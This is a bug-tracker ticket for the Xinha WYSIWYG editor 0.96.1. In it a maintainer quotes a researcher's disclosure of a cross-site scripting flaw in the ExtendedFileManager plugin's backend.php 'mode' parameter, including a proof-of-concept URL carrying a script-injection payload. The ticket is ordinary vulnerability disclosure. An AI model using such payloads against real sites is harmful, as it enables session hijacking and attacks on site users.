Opened 7 years ago

Last modified 7 years ago

#1529 new defect

Security Issues in XINHA WYSIWYG 0.96.1

Reported by: guest Owned by: gogo
Priority: normal Milestone: 0.97
Component: Xinha Core Version: trunk
Severity: normal Keywords: security issue
Cc: david.kurz@…

Description

Hello there,

we at MajorSecurity? found some security related vulnerabilities within XINHA WYSIWYG Editor. Please tell me the email address I should send the security related details to.

You may contact me at: david.kurz[(at)]majorsecurity[(dot)]net

Best regards,

David Vieira-Kurz
Head of Security Research, MajorSecurity?

Change History (2)

comment:1 follow-up: Changed 7 years ago by ejucovy

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

comment:2 in reply to: ↑ 1 Changed 7 years ago by gogo

Replying to ejucovy:

Hmm, have these vulnerabilities been addressed by the changes in 0.96.1 (#1515, #1518)? Or is this ticket still active?

I emailed them when they posted, this is what they said...


Hello,

first of all thank for the fast answer.

We at MajorSecurity? have discovered some vulnerabilities in one of the
Plugins in XINHA WYSIWYG Editor version 0.96.1, which can be exploited
by malicious people to conduct cross-site scripting attacks. Input
passed directly to the "mode" parameter in "backend.php" of the
"ExtendedFileManager" Plugin is not properly sanitised before being
stored and returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of
an affected site.

Proof of Concept:

http://localhost/xinha-0.96.1/plugins/ExtendedFileManager/backend.php?__plugin=ExtendedFileManager&__function=manager&backend_data[data]=a%3A9%3A{s%3A17%3A%22max_foldersize_mb%22%3Bi%3A10%3Bs%3A9%3A%22files_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A10%3A%22images_dir%22%3Bs%3A38%3A%22%2Fwww%2Fhtdocs%2Fw007ec76%2Fx_examples%2Fimages%22%3Bs%3A9%3A%22files_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A10%3A%22images_url%22%3Bs%3A19%3A%22%2Fx_examples%2Fimages%2F%22%3Bs%3A21%3A%22images_enable_styling%22%3Bb%3A0%3Bs%3A21%3A%22max_filesize_kb_image%22%3Bi%3A200%3Bs%3A20%3A%22max_filesize_kb_link%22%3Bs%3A3%3A%22max%22%3Bs%3A23%3A%22allowed_link_extensions%22%3Ba%3A12%3A{i%3A0%3Bs%3A3%3A%22jpg%22%3Bi%3A1%3Bs%3A3%3A%22gif%22%3Bi%3A2%3Bs%3A2%3A%22js%22%3Bi%3A3%3Bs%3A3%3A%22pdf%22%3Bi%3A4%3Bs%3A3%3A%22zip%22%3Bi%3A5%3Bs%3A3%3A%22txt%22%3Bi%3A6%3Bs%3A3%3A%22psd%22%3Bi%3A7%3Bs%3A3%3A%22png%22%3Bi%3A8%3Bs%3A4%3A%22html%22%3Bi%3A9%3Bs%3A3%3A
%22swf%22%3Bi%3A10%3Bs%3A3%3A%22xml%22%3Bi%3A11%3Bs%3A3%3A%22xls%22%3B}}&backend_data[session_name]=PHPSESSID&backend_data[key_location]=Xinha%3ABackendKey&backend_data[hash]=582686c520f11fc779ada11642d7e3b5711a3c37&PHPSESSID=599be382ae27a9a75cd2e7d039b2098a&mode="<script>alert(/XSS/)</script>

Solution:
Web applications should never trust on user generated input and
therefore sanatize all input. Edit the source code to ensure that input
is properly sanitised.


I don't remember if I did anything about it.

Note: See TracTickets for help on using tickets.